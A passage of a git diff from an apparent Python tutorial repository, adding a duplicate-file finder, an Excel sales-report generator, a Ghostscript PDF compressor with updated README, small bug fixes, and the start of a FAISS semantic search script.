+        task = progress.add_task("[cyan]Hashing files...", total=len(candidates))
+        for filepath in candidates:
+            file_hash = get_file_hash(filepath)
+            if not file_hash.startswith("ERROR:"):  # skip unreadable files
+                hash_map[file_hash].append(filepath)
+            progress.advance(task)
+
+    return hash_map, total_files, total_size
+
+
+def find_duplicates(hash_map: Dict[str, List[Path]]) -> List[Tuple[str, List[Path]]]:
+    """Return (hash, files) pairs for every hash shared by at least two files."""
+    return list(filter(lambda entry: len(entry[1]) > 1, hash_map.items()))
+
+# ═══════════════════════════════════════════════════════════════
+# DISPLAY
+# ═══════════════════════════════════════════════════════════════
+
+def format_size(size_bytes: int) -> str:
+    """Render a byte count with one decimal in B/KB/MB/GB, or TB beyond that."""
+    scaled, labels = size_bytes, ["B", "KB", "MB", "GB", "TB"]
+    while scaled >= 1024 and len(labels) > 1:
+        scaled = scaled / 1024
+        labels.pop(0)
+    return f"{scaled:.1f} {labels[0]}"
+
+
+def display_results(
+    duplicates: List[Tuple[str, List[Path]]],
+    total_files: int,
+    total_size: int,
+    root_dir: Path
+):
+    """Print a summary panel, a table of duplicate groups and a recommendation.
+
+    Paths are escaped before printing so that brackets in file names are shown
+    literally instead of being parsed as Rich markup. The first file of each
+    group is labelled KEEP, the others DUPLICATE.
+    """
+    from rich.markup import escape  # local import: only this function needs it
+
+    if not duplicates:
+        console.print(Panel(
+            f"[green]No duplicate files found in [bold]{escape(str(root_dir))}[/bold]![/green]",
+            title="Scan Complete"
+        ))
+        return
+
+    # Files in a group share a hash, hence a size: stat one file per group, once.
+    group_sizes = [files[0].stat().st_size for _, files in duplicates]
+    wasted_files = sum(len(files) - 1 for _, files in duplicates)
+    wasted_bytes = sum(s * (len(f) - 1) for s, (_, f) in zip(group_sizes, duplicates))
+
+    # Summary panel
+    summary = Table.grid(padding=(0, 2))
+    summary.add_column(style="bold cyan", justify="right")
+    summary.add_column(style="white")
+    summary.add_row("Directory scanned:", escape(str(root_dir)))
+    summary.add_row("Total files:", f"{total_files:,}")
+    summary.add_row("Total size:", format_size(total_size))
+    summary.add_row("Duplicate groups:", f"[yellow]{len(duplicates)}[/yellow]")
+    summary.add_row("Wasted files:", f"[red]{wasted_files}[/red]")
+    summary.add_row("Wasted space:", f"[red bold]{format_size(wasted_bytes)}[/red bold]")
+    console.print(Panel(summary, title="Scan Summary", border_style="blue"))
+
+    # Duplicate groups table
+    table = Table(title="Duplicate Files Found", show_lines=True)
+    table.add_column("Group", style="cyan", width=6)
+    table.add_column("File Path", style="white")
+    table.add_column("Size", style="yellow", width=12)
+    table.add_column("Status", width=10)
+    for i, ((_, files), size) in enumerate(zip(duplicates, group_sizes), 1):
+        for j, fpath in enumerate(files):
+            status = "[green]KEEP[/green]" if j == 0 else "[red]DUPLICATE[/red]"
+            table.add_row(
+                str(i) if j == 0 else "",
+                escape(str(fpath.relative_to(root_dir))),
+                format_size(size) if j == 0 else "",
+                status
+            )
+    console.print(table)
+
+    # Recommendation
+    console.print(Panel(
+        f"[yellow]To reclaim [bold]{format_size(wasted_bytes)}[/bold], review the "
+        f"[red]DUPLICATE[/red] files above and delete the copies you don't need. "
+        f"Keep one copy in each group ([green]KEEP[/green]).[/yellow]",
+        title="Recommendation",
+        border_style="yellow"
+    ))
+
+# ═══════════════════════════════════════════════════════════════
+# TEST SETUP (for demonstration)
+# ═══════════════════════════════════════════════════════════════
+
+def setup_test_files(base_dir: str = "test_files"):
+    """Recreate *base_dir* from scratch with 30 random files and 6 planted copies."""
+    root = Path(base_dir)
+    if root.exists():
+        shutil.rmtree(base_dir)
+    root.mkdir(exist_ok=True)
+
+    dirs = ["photos", "documents", "downloads", "photos/vacation", "documents/old"]
+    for sub in dirs:
+        (root / sub).mkdir(parents=True, exist_ok=True)
+
+    random.seed(42)
+    sizes = [1024, 5120, 10240, 51200, 102400]
+    extensions = [".txt", ".jpg", ".png", ".pdf", ".docx", ".csv"]
+
+    # Each record is (folder, file name, random bytes).
+    file_records = []
+    for i in range(30):
+        content = os.urandom(random.choice(sizes))
+        folder = random.choice(dirs)
+        file_records.append((folder, f"file_{i:03d}{random.choice(extensions)}", content))
+
+    # (index of the original record, target folder, name of the copy)
+    duplicate_plan = [
+        (0, "photos/vacation", "beach_photo.jpg"),
+        (0, "downloads", "temp_image.jpg"),        # triplicate!
+        (5, "documents/old", "old_report.pdf"),
+        (10, "downloads", "budget_backup.csv"),
+        (15, "photos", "profile_pic_copy.png"),
+        (20, "documents/old", "archived_notes.docx"),
+    ]
+    for orig_idx, dup_folder, dup_name in duplicate_plan:
+        target_dir = root / dup_folder
+        target_dir.mkdir(parents=True, exist_ok=True)
+        (target_dir / dup_name).write_bytes(file_records[orig_idx][2])
+
+    for folder, name, content in file_records:
+        (root / folder / name).write_bytes(content)
+
+    return base_dir
+
+# ═══════════════════════════════════════════════════════════════
+# MAIN
+# ═══════════════════════════════════════════════════════════════
+
+def main():
+    """Scan the CLI-given directory, or a generated demo tree; exit 1 on a bad path."""
+    if len(sys.argv) > 1:
+        target_dir = sys.argv[1]
+        if not Path(target_dir).is_dir():
+            # markup=False: print the user's path verbatim, brackets included.
+            console.print(f"Not a directory: {target_dir}", style="red", markup=False)
+            sys.exit(1)
+        console.print(f"[bold]Scanning [cyan]{target_dir}[/cyan] for duplicates...[/bold]\n")
+    else:
+        console.print("[bold]Setting up test files...[/bold]")
+        target_dir = setup_test_files("test_files")
+        console.print("[bold]Scanning for duplicates...[/bold]\n")
+    hash_map, total_files, total_size = scan_directory(Path(target_dir))
+    display_results(find_duplicates(hash_map), total_files, total_size, Path(target_dir))
+
+
+if __name__ == "__main__":
+    main()
diff --git a/general/interactive-weather-plot/interactive_weather_plot.py b/general/interactive-weather-plot/interactive_weather_plot.py
index b4d17141..3d1ea566 100644
--- a/general/interactive-weather-plot/interactive_weather_plot.py
+++ b/general/interactive-weather-plot/interactive_weather_plot.py
@@ -68,7 +68,7 @@ def changeLocation(newLocation):
 # Making the Radio Buttons
 buttons = RadioButtons(
     ax=plt.axes([0.1, 0.1, 0.2, 0.2]),
-    labels=locations.keys()
+    labels=list(locations.keys())
 )
 
 # Connect click event on the buttons to the function that changes location.
@@ -86,4 +86,4 @@ def changeLocation(newLocation):
 
 plt.savefig('file.svg', format='svg')
 
-plt.show()
\ No newline at end of file
+plt.show()
diff --git a/general/sales-report-generator/sales_report_generator.py b/general/sales-report-generator/sales_report_generator.py
new file mode 100644
index 00000000..eea6c278
--- /dev/null
+++ b/general/sales-report-generator/sales_report_generator.py
@@ -0,0 +1,283 @@
+"""
+Automated Sales Report Generator
+Produces a 4-sheet professional Excel report from raw sales data.
+
+Usage:
+    python sales_report_generator.py
+    → generates Sales_Report_Q1_2025.xlsx
+
+Requirements:
+    pip install openpyxl
+"""
+from openpyxl import Workbook
+from openpyxl.styles import Font, PatternFill, Alignment, Border, Side
+from openpyxl.chart import BarChart, PieChart, Reference
+from openpyxl.chart.label import DataLabelList
+from openpyxl.chart.series import DataPoint
+from openpyxl.utils import get_column_letter
+from openpyxl.formatting.rule import DataBarRule, ColorScaleRule
+from collections import defaultdict
+
+# ============================================================
+# CONFIGURATION — swap this with your own data source
+# ============================================================
+SALES_DATA = [
+    # Product, Category, Region, Units, Price, Cost
+    ["Wireless Mouse", "Accessories", "North", 145, 24.99, 12.50],
+    ["Mechanical Keyboard", "Accessories", "North", 98, 89.99, 45.00],
+    ["USB-C Hub", "Accessories", "South", 210, 34.50, 17.25],
+    ["27\" Monitor", "Displays", "East", 45, 299.99, 180.00],
+    ["24\" Monitor", "Displays", "West", 67, 189.99, 110.00],
+    ["Webcam 1080p", "Peripherals", "North", 167, 54.99, 27.50],
+    ["Laptop Stand", "Accessories", "South", 320, 39.99, 15.00],
+    ["Desk Lamp LED", "Office", "East", 275, 29.99, 10.00],
+    ["Standing Desk", "Office", "West", 22, 499.99, 250.00],
+    ["Noise Canceling Phones", "Audio", "North", 89, 149.99, 75.00],
+    ["Bluetooth Speaker", "Audio", "South", 134, 79.99, 40.00],
+    ["HDMI Cable 6ft", "Accessories", "East", 450, 12.99, 4.00],
+    ["Wireless Charger", "Accessories", "West", 189, 19.99, 8.00],
+    ["Ergonomic Chair", "Office", "North", 15, 899.99, 450.00],
+]
+
+# ============================================================
+# STYLES
+# ============================================================
+DARK_BLUE, MED_BLUE, LIGHT_BLUE = "1F4E79", "2E75B6", "D6E4F0"
+GREEN_HEADER, LIGHT_GREEN, WHITE = "375623", "E2EFDA", "FFFFFF"
+
+hdr_fill = PatternFill(start_color=DARK_BLUE, end_color=DARK_BLUE, fill_type="solid")
+hdr_font = Font(name="Calibri", size=11, bold=True, color=WHITE)
+hdr_align = Alignment(horizontal="center", vertical="center", wrap_text=True)
+thin_border = Border(left=Side(style="thin"), right=Side(style="thin"),
+                     top=Side(style="thin"), bottom=Side(style="thin"))
+alt_fill = PatternFill(start_color=LIGHT_BLUE, end_color=LIGHT_BLUE, fill_type="solid")
+curr_fmt, num_fmt, pct_fmt = '$#,##0.00', '#,##0', '0.0%'
+
+# ============================================================
+# BUILD WORKBOOK
+# ============================================================
+wb = Workbook()
+
+# ----- SHEET 1: Detailed Sales Data -----
+ws = wb.active
+ws.title = "Sales Data"
+
+headers = ["Product", "Category", "Region", "Units Sold",
+           "Unit Price", "Unit Cost", "Revenue", "Profit", "Margin %"]
+for c, h in enumerate(headers, 1):
+    cell = ws.cell(row=1, column=c, value=h)
+    cell.fill, cell.font, cell.alignment, cell.border = hdr_fill, hdr_font, hdr_align, thin_border
+
+for r, row in enumerate(SALES_DATA, 2):
+    # Columns A-F hold the raw values; G-I (revenue, profit, margin) are Excel
+    # formulas, so the sheet recalculates when a value is edited by hand.
+    # The margin formula returns 0 instead of #DIV/0! when revenue is zero.
+    formulas = [f"=D{r}*E{r}", f"=G{r}-(D{r}*F{r})", f"=IF(G{r}=0,0,H{r}/G{r})"]
+
+    # Style all nine columns alike so the formula cells get the same font,
+    # border, alignment and banding as the data cells beside them.
+    for c, val in enumerate(list(row) + formulas, 1):
+        cell = ws.cell(row=r, column=c, value=val)
+        cell.font = Font(name="Calibri", size=10)
+        cell.border = thin_border
+        if c >= 4:
+            cell.alignment = Alignment(horizontal="right")
+        if r % 2 == 0:
+            cell.fill = alt_fill
+        if c >= 5:
+            # E-H are currency amounts; I (column 9) is the margin ratio.
+            cell.number_format = pct_fmt if c == 9 else curr_fmt
+
+# Totals row
+tr = len(SALES_DATA) + 2
+ws.merge_cells(f"A{tr}:C{tr}")
+tc = ws.cell(row=tr, column=1, value="TOTALS")
+tc.font = Font(name="Calibri", size=11, bold=True, color=DARK_BLUE)
+tc.alignment = Alignment(horizontal="right")
+tc.fill = PatternFill(start_color=LIGHT_GREEN, end_color=LIGHT_GREEN, fill_type="solid")
+for col in [4, 7, 8]:
+    cell = ws.cell(row=tr, column=col)
+    cell.value = f"=SUM({get_column_letter(col)}2:{get_column_letter(col)}{tr - 1})"
+    cell.font = Font(name="Calibri", size=11, bold=True)
+    cell.fill = PatternFill(start_color=LIGHT_GREEN, end_color=LIGHT_GREEN, fill_type="solid")
+    cell.border = thin_border
+    cell.number_format = curr_fmt if col >= 7 else num_fmt
+
+# Conditional formatting + freeze + auto-filter
+ws.conditional_formatting.add(
+    f"I2:I{tr - 1}",
+    ColorScaleRule(start_type="num", start_value=0, start_color="F8696B",
+                   mid_type="percentile", mid_value=50, mid_color="FFEB84",
+                   end_type="num", end_value=0.6, end_color="63BE7B"))
+ws.conditional_formatting.add(
+    f"D2:D{tr - 1}",
+    DataBarRule(start_type="min", end_type="max", color=MED_BLUE, showValue=True))
+ws.freeze_panes = "A2"
+ws.auto_filter.ref = f"A1:I{tr - 1}"
+
+# Column widths
+for i, w in enumerate([26, 16, 10, 12, 14, 14, 14, 14, 12], 1):
+    ws.column_dimensions[get_column_letter(i)].width = w
+
+# ----- SHEET 2: Category Summary -----
+ws_cat = wb.create_sheet("Category Summary")
+
+# Aggregate by category
+cat_data = defaultdict(lambda: {"units": 0, "revenue": 0.0, "profit": 0.0})
+for row in SALES_DATA:
+    cat, units, price, cost = row[1], row[3], row[4], row[5]
+    rev = units * price
+    cat_data[cat]["units"] += units
+    cat_data[cat]["revenue"] += rev
+    cat_data[cat]["profit"] += rev - (units * cost)
+
+sorted_cats = sorted(cat_data.items(), key=lambda x: x[1]["revenue"], reverse=True)
+
+for c, h in enumerate(["Category", "Total Units", "Total Revenue", "Total Profit", "Margin %"], 1):
+    cell = ws_cat.cell(row=1, column=c, value=h)
+    cell.fill = PatternFill(start_color=GREEN_HEADER, end_color=GREEN_HEADER, fill_type="solid")
+    cell.font = Font(name="Calibri", size=11, bold=True, color=WHITE)
+    cell.alignment, cell.border = hdr_align, thin_border
+
+for r, (cat, vals) in enumerate(sorted_cats, 2):
+    # One row per category, highest revenue first (order of sorted_cats).
+    # The margin is a formula guarded against zero revenue, which would
+    # otherwise show #DIV/0! for a category that sold nothing.
+    row_values = [cat, vals["units"], round(vals["revenue"], 2),
+                  round(vals["profit"], 2), f"=IF(C{r}=0,0,D{r}/C{r})"]
+    row_formats = [None, None, curr_fmt, curr_fmt, pct_fmt]
+    for c, (val, fmt) in enumerate(zip(row_values, row_formats), 1):
+        cell = ws_cat.cell(row=r, column=c, value=val)
+        cell.font = Font(name="Calibri", size=10)
+        cell.border = thin_border
+        if c >= 2:
+            cell.alignment = Alignment(horizontal="right")
+        if r % 2 == 0:
+            cell.fill = alt_fill
+        if fmt is not None:
+            cell.number_format = fmt
+
+# Bar chart
+bar = BarChart()
+bar.type = "col"
+bar.style = 10
+bar.title = "Revenue by Product Category"
+bar.width, bar.height = 22, 14
+bar.add_data(Reference(ws_cat, min_col=3, min_row=1, max_row=len(sorted_cats) + 1),
+             titles_from_data=True)
+bar.set_categories(Reference(ws_cat, min_col=1, min_row=2, max_row=len(sorted_cats) + 1))
+chart_colors = ["2E75B6", "ED7D31", "A5A5A5", "FFC000", "4472C4", "70AD47"]
+for i in range(len(sorted_cats)):
+    pt = DataPoint(idx=i)
+    pt.graphicalProperties.solidFill = chart_colors[i % 6]
+    bar.series[0].data_points.append(pt)
+ws_cat.add_chart(bar, "G2")
+ws_cat.conditional_formatting.add(
+    f"C2:C{len(sorted_cats) + 1}",
+    DataBarRule(start_type="min", end_type="max", color=MED_BLUE, showValue=True))
+for i, w in enumerate([20, 14, 18, 16, 12], 1):
+    ws_cat.column_dimensions[get_column_letter(i)].width = w
+
+# ----- SHEET 3: Regional Breakdown -----
+ws_reg = wb.create_sheet("Regional Breakdown")
+reg_data = defaultdict(lambda: {"units": 0, "revenue": 0.0})
+for row in SALES_DATA:
+    reg = row[2]
+    units = row[3]
+    rev = units * row[4]
+    reg_data[reg]["units"] += units
+    reg_data[reg]["revenue"] += rev
+
+for c, h in enumerate(["Region", "Units Sold", "Revenue"], 1):
+    cell = ws_reg.cell(row=1, column=c, value=h)
+    cell.fill, cell.font, cell.alignment, cell.border = hdr_fill, hdr_font, hdr_align, thin_border
+
+for r, (reg, vals) in enumerate(sorted(reg_data.items()), 2):
+    ws_reg.cell(row=r, column=1, value=reg)
+    ws_reg.cell(row=r, column=2, value=vals["units"])
+    ws_reg.cell(row=r, column=3, value=round(vals["revenue"], 2))
+    for c in range(1, 4):
+        cell = ws_reg.cell(row=r, column=c)
+        cell.font = Font(name="Calibri", size=10)
+        cell.border = thin_border
+        if c >= 2:
+            cell.alignment = Alignment(horizontal="right")
+    ws_reg.cell(row=r, column=3).number_format = curr_fmt
+
+# Pie chart
+pie = PieChart()
+pie.title = "Revenue Share by Region"
+pie.width, pie.height = 18, 14
+pie.add_data(Reference(ws_reg, min_col=3, min_row=1, max_row=len(reg_data) + 1),
+             titles_from_data=True)
+pie.set_categories(Reference(ws_reg, min_col=1, min_row=2, max_row=len(reg_data) + 1))
+pie.dataLabels = DataLabelList()
+pie.dataLabels.showPercent = True
+pie.dataLabels.showCatName = True
+for i in range(len(reg_data)):
+    pt = DataPoint(idx=i)
+    pt.graphicalProperties.solidFill = chart_colors[i % 6]
+    pie.series[0].data_points.append(pt)
+ws_reg.add_chart(pie, "E2")
+for c, w in [('A', 14), ('B', 14), ('C', 14)]:
+    ws_reg.column_dimensions[c].width = w
+
+# ----- SHEET 4: Executive Dashboard -----
+ws_exec = wb.create_sheet("Executive Dashboard")
+ws_exec.merge_cells("A1:F1")
+title = ws_exec.cell(row=1, column=1, value="SALES PERFORMANCE DASHBOARD — Q1 2025")
+title.font = Font(name="Calibri", size=16, bold=True, color=DARK_BLUE)
+title.alignment = Alignment(horizontal="center", vertical="center")
+ws_exec.row_dimensions[1].height = 35
+
+total_revenue = sum(r[3] * r[4] for r in SALES_DATA)
+total_units = sum(r[3] for r in SALES_DATA)
+total_profit = sum((r[3] * r[4]) - (r[3] * r[5]) for r in SALES_DATA)
+avg_margin = total_profit / total_revenue if total_revenue else 0
+
+kpis = [("TOTAL REVENUE", f"${total_revenue:,.0f}", 1),
+        ("TOTAL UNITS SOLD", f"{total_units:,}", 2),
+        ("TOTAL PROFIT", f"${total_profit:,.0f}", 3),
+        ("AVG MARGIN", f"{avg_margin:.1%}", 4)]
+for kpi_title, kpi_val, col in kpis:
+    for r_offset, (val, font) in enumerate(
+        [(kpi_title, Font(size=10, bold=True, color=WHITE)),
+         (kpi_val, Font(size=22, bold=True, color=WHITE))]):
+        cell = ws_exec.cell(row=3 + r_offset, column=col, value=val)
+        cell.font = font
+        cell.fill = PatternFill(start_color=MED_BLUE, end_color=MED_BLUE, fill_type="solid")
+        cell.alignment = Alignment(horizontal="center")
+    ws_exec.column_dimensions[get_column_letter(col)].width = 22
+ws_exec.row_dimensions[4].height = 40
+
+# Summary table on dashboard
+ws_exec.merge_cells("A6:D6")
+ws_exec.cell(row=6, column=1, value="Key Metrics by Category").font = Font(
+    size=12, bold=True, color=DARK_BLUE)
+for c, h in enumerate(["Category", "Units", "Revenue", "Profit"], 1):
+    cell = ws_exec.cell(row=7, column=c, value=h)
+    cell.fill, cell.font, cell.alignment, cell.border = hdr_fill, hdr_font, hdr_align, thin_border
+for r, (cat, vals) in enumerate(sorted_cats, 8):
+    ws_exec.cell(row=r, column=1, value=cat)
+    ws_exec.cell(row=r, column=2, value=vals["units"])
+    ws_exec.cell(row=r, column=3, value=round(vals["revenue"], 2))
+    ws_exec.cell(row=r, column=4, value=round(vals["profit"], 2))
+    for c in range(1, 5):
+        cell = ws_exec.cell(row=r, column=c)
+        cell.font = Font(name="Calibri", size=10)
+        cell.border = thin_border
+        if r % 2 == 0:
+            cell.fill = alt_fill
+    ws_exec.cell(row=r, column=3).number_format = curr_fmt
+    ws_exec.cell(row=r, column=4).number_format = curr_fmt
+
+# ============================================================
+# SAVE
+# ============================================================
+output_path = "Sales_Report_Q1_2025.xlsx"
+wb.save(output_path)
+print(f"✅ Report generated: {output_path}")
+print(f"   Sheets: {wb.sheetnames}")
+print(f"   Total Revenue: ${total_revenue:,.2f}")
+print(f"   Total Profit: ${total_profit:,.2f}")
+print(f"   Avg Margin: {avg_margin:.1%}")
diff --git a/gui-programming/rich-text-editor/rich_text_editor.py b/gui-programming/rich-text-editor/rich_text_editor.py
index 10c14263..05259905 100644
--- a/gui-programming/rich-text-editor/rich_text_editor.py
+++ b/gui-programming/rich-text-editor/rich_text_editor.py
@@ -112,9 +112,9 @@ def fileManager(event=None, action=None):
             document['tags'][tagName] = []
 
             ranges = textArea.tag_ranges(tagName)
-
-            for i, tagRange in enumerate(ranges[::2]):
-                document['tags'][tagName].append([str(tagRange), str(ranges[i+1])])
+	
+            for i in range(0, len(ranges), 2):
+                document['tags'][tagName].append([str(ranges[i]), str(ranges[i + 1])])
 
         if not filePath:
             # ask the user for a filename with the native file explorer.
diff --git a/handling-pdf-files/pdf-compressor/README.md b/handling-pdf-files/pdf-compressor/README.md
index 4527174c..307f105c 100644
--- a/handling-pdf-files/pdf-compressor/README.md
+++ b/handling-pdf-files/pdf-compressor/README.md
@@ -1,8 +1,48 @@
 # [How to Compress PDF Files in Python](https://www.thepythoncode.com/article/compress-pdf-files-in-python)
-To run this:
-- `pip3 install -r requirements.txt`
-- To compress `bert-paper.pdf` file:
-    ```
-    $ python pdf_compressor.py bert-paper.pdf bert-paper-min.pdf
-    ```
-    This will spawn a new compressed PDF file under the name `bert-paper-min.pdf`.
+
+This directory contains two approaches:
+
+- Legacy (commercial): `pdf_compressor.py` uses PDFTron/PDFNet. PDFNet now requires a license key and the old pip package is not freely available, so this may not work without a license.
+- Recommended (open source): `pdf_compressor_ghostscript.py` uses Ghostscript to compress PDFs.
+
+## Ghostscript method (recommended)
+
+Prerequisite: Install Ghostscript
+
+- macOS (Homebrew):
+  - `brew install ghostscript`
+- Ubuntu/Debian:
+  - `sudo apt-get update && sudo apt-get install -y ghostscript`
+- Windows:
+  - Download and install from https://ghostscript.com/releases/
+  - Ensure `gswin64c.exe` (or `gswin32c.exe`) is in your PATH.
+
+No Python packages are required for this method, only Ghostscript.
+
+### Usage
+
+To compress `bert-paper.pdf` into `bert-paper-min.pdf` with default quality (`power=2`):
+
+```
+python pdf_compressor_ghostscript.py bert-paper.pdf bert-paper-min.pdf
+```
+
+The optional `[power]` argument (0-4) sets the compression/quality trade-off by selecting a Ghostscript `-dPDFSETTINGS` preset:
+
+- 0 = `/screen` (smallest, lowest quality)
+- 1 = `/ebook` (good quality)
+- 2 = `/printer` (high quality) [default]
+- 3 = `/prepress` (very high quality)
+- 4 = `/default` (Ghostscript default)
+
+Example:
+
+```
+python pdf_compressor_ghostscript.py bert-paper.pdf bert-paper-min.pdf 1
+```
+
+In testing, `bert-paper.pdf` (~757 KB) compressed to ~407 KB with `power=1`.
+
+## Legacy PDFNet method (requires license)
+
+If you have a valid license and the PDFNet SDK installed, you can use the original `pdf_compressor.py` script. Note that the previously referenced `PDFNetPython3` pip package is not freely available and may not install via pip. Refer to the vendor's documentation for installation and licensing.
\ No newline at end of file
diff --git a/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py b/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py
new file mode 100644
index 00000000..88de4062
--- /dev/null
+++ b/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py
@@ -0,0 +1,103 @@
+import os
+import sys
+import subprocess
+import shutil
+
+
+def get_size_format(b, factor=1024, suffix="B"):
+    """Scale *b* down by *factor* and format it with two decimals and a unit prefix."""
+    prefixes = ["", "K", "M", "G", "T", "P", "E", "Z", "Y"]
+    while b >= factor and len(prefixes) > 1:
+        b, prefixes = b / factor, prefixes[1:]
+    return f"{b:.2f}{prefixes[0]}{suffix}"
+
+
+def find_ghostscript_executable():
+    """Return the path of the first Ghostscript binary on PATH, or None.
+
+    Lookup order: ``gs``, ``gswin64c``, ``gswin32c``.
+    """
+    for name in ('gs', 'gswin64c', 'gswin32c'):
+        located = shutil.which(name)
+        if located:
+            return located
+    return None
+
+
+def compress_file(input_file: str, output_file: str, power: int = 2):
+    """Compress PDF using Ghostscript.
+
+    power (unknown values fall back to /printer):
+        0 -> /screen (lowest quality, highest compression)
+        1 -> /ebook (good quality)
+        2 -> /printer (high quality) [default]
+        3 -> /prepress (very high quality)
+        4 -> /default (Ghostscript default)
+
+    If output_file is empty or is the input itself, output goes to a temporary
+    file beside the input that then replaces it, so the input is never
+    overwritten while it is still being read.
+
+    Returns True on success, False if Ghostscript exits with an error.
+    """
+    import tempfile  # local import: only needed for in-place compression
+
+    if not os.path.exists(input_file):
+        raise FileNotFoundError(f"Input file not found: {input_file}")
+    output_file = output_file or input_file
+    src = os.path.abspath(input_file)
+    in_place = os.path.abspath(output_file) == src
+    initial_size = os.path.getsize(input_file)
+
+    gs = find_ghostscript_executable()
+    if not gs:
+        raise RuntimeError(
+            "Ghostscript not found. Install it and ensure 'gs' (Linux/macOS) "
+            "or 'gswin64c'/'gswin32c' (Windows) is in PATH."
+        )
+
+    settings_map = {0: '/screen', 1: '/ebook', 2: '/printer', 3: '/prepress', 4: '/default'}
+    pdfsettings = settings_map.get(power, '/printer')
+    target = output_file
+    if in_place:
+        fd, target = tempfile.mkstemp(suffix='.pdf', dir=os.path.dirname(src))
+        os.close(fd)
+    cmd = [
+        gs, '-sDEVICE=pdfwrite', '-dCompatibilityLevel=1.4', f'-dPDFSETTINGS={pdfsettings}',
+        '-dNOPAUSE', '-dBATCH', '-dQUIET', f'-sOutputFile={target}', input_file,
+    ]
+    try:
+        subprocess.run(cmd, check=True)
+    except subprocess.CalledProcessError as e:
+        print(f"Ghostscript failed: {e}")
+        if in_place:
+            os.remove(target)  # leave the untouched input as the only file
+        return False
+    if in_place:
+        shutil.copymode(src, target)  # keep the original file's permissions
+        os.replace(target, output_file)
+
+    compressed_size = os.path.getsize(output_file)
+    ratio = 1 - (compressed_size / initial_size) if initial_size else 0.0
+    summary = {
+        "Input File": input_file,
+        "Initial Size": get_size_format(initial_size),
+        "Output File": output_file,
+        "Compressed Size": get_size_format(compressed_size),
+        "Compression Ratio": f"{ratio:.3%}",
+    }
+    print("## Summary ########################################################")
+    for k, v in summary.items():
+        print(f"{k}: {v}")
+    print("###################################################################")
+    return True
+
+
+if __name__ == '__main__':
+    # CLI: <input.pdf> <output.pdf> [power]; exit 1 = bad usage, 2 = Ghostscript failed.
+    args = sys.argv[1:]
+    if len(args) < 2 or (len(args) > 2 and args[2] not in ('0', '1', '2', '3', '4')):
+        print("Usage: python pdf_compressor_ghostscript.py <input.pdf> <output.pdf> [power 0-4]")
+        sys.exit(1)
+    power = int(args[2]) if len(args) > 2 else 2
+    ok = compress_file(args[0], args[1], power)
+    sys.exit(0 if ok else 2)
\ No newline at end of file
diff --git a/handling-pdf-files/pdf-compressor/requirements.txt b/handling-pdf-files/pdf-compressor/requirements.txt
index 0a664a86..9f6e5337 100644
--- a/handling-pdf-files/pdf-compressor/requirements.txt
+++ b/handling-pdf-files/pdf-compressor/requirements.txt
@@ -1 +1,7 @@
-PDFNetPython3==8.1.0
\ No newline at end of file
+# No Python dependencies required for Ghostscript-based compressor.
+# System dependency: Ghostscript
+# - macOS:   brew install ghostscript
+# - Debian:  sudo apt-get install -y ghostscript
+# - Windows: https://ghostscript.com/releases/
+#
+# The legacy script (pdf_compressor.py) depends on PDFNet (commercial) and a license key.
\ No newline at end of file
diff --git a/images/codingfleet-banner-2.png b/images/codingfleet-banner-2.png
new file mode 100644
index 00000000..e95c4d27
Binary files /dev/null and b/images/codingfleet-banner-2.png differ
diff --git a/images/codingfleet-banner-3.png b/images/codingfleet-banner-3.png
new file mode 100644
index 00000000..9f27495e
Binary files /dev/null and b/images/codingfleet-banner-3.png differ
diff --git a/images/iproyal-1.png b/images/iproyal-1.png
new file mode 100644
index 00000000..9e607e13
Binary files /dev/null and b/images/iproyal-1.png differ
diff --git a/machine-learning/semantic-search-faiss/semantic_search.py b/machine-learning/semantic-search-faiss/semantic_search.py
new file mode 100644
index 00000000..e2ec4d9b
--- /dev/null
+++ b/machine-learning/semantic-search-faiss/semantic_search.py
@@ -0,0 +1,118 @@
+"""
+Semantic Search Engine with FAISS + Sentence Transformers
+=========================================================
+Builds a fully local semantic search engine.
+Requirements: pip install sentence-transformers faiss-cpu numpy rich matplotlib scikit-learn
+"""
+import numpy as np
+from sentence_transformers import SentenceTransformer
+import faiss
+from rich.console import Console
+from rich.table import Table
+from rich.panel import Panel
+from rich.progress import Progress, SpinnerColumn, TextColumn, BarColumn
+import time
+import matplotlib
+matplotlib.use('Agg')
+import matplotlib.pyplot as plt
+from sklearn.decomposition import PCA
+
+console = Console()
+
+# 42 documents across 7 categories (listed in runs of 3 per category, cycling through the categories twice): Tech, Science, Cooking, Travel, Health, Business, Arts
+documents = [
+    "Python is a high-level programming language known for its readability and simplicity",
+    "Docker containers package applications with their dependencies for consistent deployment",
+    "REST APIs use HTTP methods like GET, POST, PUT, and DELETE to interact with web resources",
+    "Photosynthesis is the process by which plants convert sunlight into chemical energy",
+    "Black holes are regions of spacetime where gravity is so strong that nothing can escape",
+    "Plate tectonics explains how Earth's crust moves, causing earthquakes and volcanic activity",
+    "Pasta carbonara is an Italian dish made with eggs, cheese, pancetta, and black pepper",
+    "Sourdough bread uses naturally occurring wild yeast and bacteria for fermentation",
+    "The Maillard reaction creates brown crusts and complex flavors when proteins are heated",
+    "The Great Wall of China stretches over 13,000 miles across northern China",
+    "Tokyo is the most populous metropolitan area in the world with over 37 million residents",
+    "Bali is an Indonesian island known for its terraced rice paddies and Hindu temples",
+    "Regular cardiovascular exercise strengthens the heart and improves blood circulation",
+    "A balanced diet includes fruits, vegetables, whole grains, lean proteins, and healthy fats",
+    "Meditation reduces stress by helping practitioners focus on the present moment",
+    "Compound interest allows investments to grow exponentially over long periods of time",
+    "Diversification spreads investment risk across different asset classes and sectors",
+    "A budget helps individuals and businesses track income and expenses to meet financial goals",
+    "The Renaissance was a period of great artistic and intellectual achievement in Europe",
+    "Digital art uses computer technology as an essential part of the creative process",
+    "Abstract art uses shapes, colors, and forms to achieve its effect rather than realistic depiction",
+    "Git is a distributed version control system that tracks changes in source code",
+    "Kubernetes orchestrates containerized applications across clusters of machines",
+    "Neural networks are computing systems inspired by biological neurons in the human brain",
+    "DNA molecules contain the genetic instructions for the development of all living organisms",
+    "Evolution by natural selection explains how species adapt to their environments over time",
+    "Climate change refers to long-term shifts in global temperatures and weather patterns",
+    "Sushi is a Japanese dish of vinegared rice combined with raw fish and vegetables",
+    "Chocolate chip cookies should be baked until the edges are golden but the center is soft",
+    "Baking requires precise measurements because it involves complex chemical reactions",
+    "Machu Picchu is a 15th-century Inca citadel located high in the Andes Mountains in Peru",
+    "The Northern Lights are caused by solar particles interacting with Earth's magnetic field",
+    "Iceland has over 130 volcanoes and numerous geothermal hot springs used for bathing",
